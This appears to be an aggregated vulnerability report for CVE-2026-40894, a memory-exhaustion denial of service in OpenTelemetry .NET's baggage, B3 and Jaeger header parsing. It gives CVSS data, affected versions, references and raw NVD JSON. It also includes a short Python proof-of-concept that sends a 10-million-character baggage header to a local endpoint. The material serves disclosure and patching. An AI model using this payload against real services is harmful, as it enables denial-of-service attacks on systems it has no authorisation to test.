Security Vulnerability Report
CVE-2026-40894 (CVSS 5.3, MEDIUM)


Published: 2026-04-23 19:17:29
Last Modified: 2026-04-28 19:34:26

Description

OpenTelemetry dotnet is a .NET telemetry framework. In OpenTelemetry.Api 0.5.0-beta.2 to 1.15.2 and OpenTelemetry.Extensions.Propagators 1.3.1 to 1.15.2, the baggage, B3 and Jaeger processing code in the OpenTelemetry.Api and OpenTelemetry.Extensions.Propagators NuGet packages can allocate excessive memory while parsing, which could create a potential denial of service (DoS) in the consuming application. This vulnerability is fixed in 1.15.3.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:a:opentelemetry:opentelemetry:*:*:*:*:*:.net:*:* - VULNERABLE
cpe:2.3:a:opentelemetry:opentelemetry.api:*:*:*:*:*:.net:*:* - VULNERABLE
cpe:2.3:a:opentelemetry:opentelemetry.extensions.propagators:*:*:*:*:*:*:*:* - VULNERABLE
OpenTelemetry.Api >= 0.5.0-beta.2, <= 1.15.2
OpenTelemetry.Extensions.Propagators >= 1.3.1, <= 1.15.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL (Replace with actual vulnerable endpoint)
target_url = "http://localhost:5000/api/trace"

# Generate a malicious payload to trigger excessive memory allocation.
# This targets the baggage parsing logic mentioned in the advisory.
# Creating a very long key-value pair can exhaust memory during parsing.
malicious_payload = "key=" + "A" * 10000000  # 10 million characters

headers = {
    "baggage": malicious_payload,
    "User-Agent": "CVE-2026-40894-POC",
}

try:
    print(f"Sending payload to {target_url}...")
    response = requests.get(target_url, headers=headers, timeout=10)
    print(f"Request completed. Status Code: {response.status_code}")
except requests.exceptions.Timeout:
    print("Request timed out. Potential DoS condition triggered.")
except Exception as e:
    print(f"An error occurred: {e}")
```

References

https://github.com/open-telemetry/opentelemetry-dotnet/pull/1048 (Issue Tracking, Patch)
https://github.com/open-telemetry/opentelemetry-dotnet/pull/3244 (Issue Tracking, Patch)
https://github.com/open-telemetry/opentelemetry-dotnet/pull/3309 (Issue Tracking, Patch)
https://github.com/open-telemetry/opentelemetry-dotnet/pull/533 (Issue Tracking, Patch)
https://github.com/open-telemetry/opentelemetry-dotnet/pull/7061 (Issue Tracking, Patch)
https://github.com/open-telemetry/opentelemetry-dotnet/security/advisories/GHSA-g94r-2vxg-569j (Vendor Advisory, Mitigation)

Raw JSON Data

```json
{"cve": {"id": "CVE-2026-40894", "sourceIdentifier": "[email protected]", "published": "2026-04-23T19:17:28.810", "lastModified": "2026-04-28T19:34:26.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenTelemetry dotnet is a dotnet telemetry framework. In OpenTelemetry.Api 0.5.0-beta.2 to 1.15.2 and OpenTelemetry.Extensions.Propagators 1.3.1 to 1.15.2, The implementation details of the baggage, B3 and Jaeger processing code in the OpenTelemetry.Api and OpenTelemetry.Extensions.Propagators NuGet packages can allocate excessive memory when parsing which could create a potential denial of service (DoS) in the consuming application. This vulnerability is fixed in 1.15.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-789"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opentelemetry:opentelemetry:*:*:*:*:*:.net:*:*", "versionStartIncluding": "0.5.0", "versionEndExcluding": "1.15.3", "matchCriteriaId": "7CF8EB09-F7C5-49FA-BE45-15C9D6ACAE68"}, {"vulnerable": true, "criteria": "cpe:2.3:a:opentelemetry:opentelemetry.api:*:*:*:*:*:.net:*:*", "versionStartIncluding": "0.5.0", "versionEndExcluding": "1.15.3", "matchCriteriaId": "F4494846-0F47-4868-8315-76F82BA431CA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:opentelemetry:opentelemetry.extensions.propagators:*:*:*:*:*:*:*:*", "versionStartExcluding": "1.3.0", "versionEndExcluding": "1.15.3", "matchCriteriaId": "FD34268F-5D62-4ACF-9E83-22DA39B5B7F3"}]}]}], "references": [{"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/1048", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/3244", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/3309", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/533", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/pull/7061", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/open-telemetry/opentelemetry-dotnet/security/advisories/GHSA-g94r-2vxg-569j", "source": "[email protected]", "tags": ["Vendor Advisory", "Mitigation"]}]}}
```